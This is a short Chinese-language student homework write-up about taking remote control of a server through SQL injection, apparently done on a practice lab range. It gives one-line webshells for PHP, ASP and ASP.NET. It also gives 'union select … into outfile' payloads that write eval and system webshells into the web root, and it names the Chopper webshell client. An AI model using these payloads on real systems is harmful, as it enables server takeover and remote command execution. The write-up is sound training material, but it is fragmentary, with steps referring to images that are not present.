黄教头第五周作业 通过sqli进行服务器的远程控制案例测试
Sql-Inject漏洞手动测试-Os远程控制
一句话木马
如何通过into outfile写入恶意代码并控制OS
一句话木马
一句话木马是一种短小而精悍的木马客户端,隐蔽性好,且功能强大.
PHP: <[email protected]($_POST['chopper']);?>
ASP: <%eval request(“chopper”)%>
ASP.NET: <%@Page Language=“Jscript”%><%eval(Request.Item[“chopper”,“unsafe”);%>
select 1,2 into outfile"/var/www/html/1.txt"
into outfile 将select的结果写入到指定目录的1.txt中
在一些没有回显的注入中可以使用into outfile将结果写入到指定文件,然后访问获取
前提条件:
1.需要知道远程目录
2.需要远程目录有写权限
3.需要数据库开启了secure_file_priv
查看
show global variables like ‘%secure%’;
把null 改成空
kobe’ union select “<?php @eval($_GET['test'])?>”,2 into outfile “/var/www/html/1.php”#
出现了以下问题
进行改正
查看注入
远程操作系统命令
kobe’ union select “<?php @system($_GET['test'])?>”,2 into outfile “/var/www/html/1.php”#
还可以通过菜刀
等进行远程命令执行
在之前的行动中
出现了
靶场打不开的问题
后来通过重启bp
关掉拦截命令得以解决
应该是电脑重启时出现的相应故障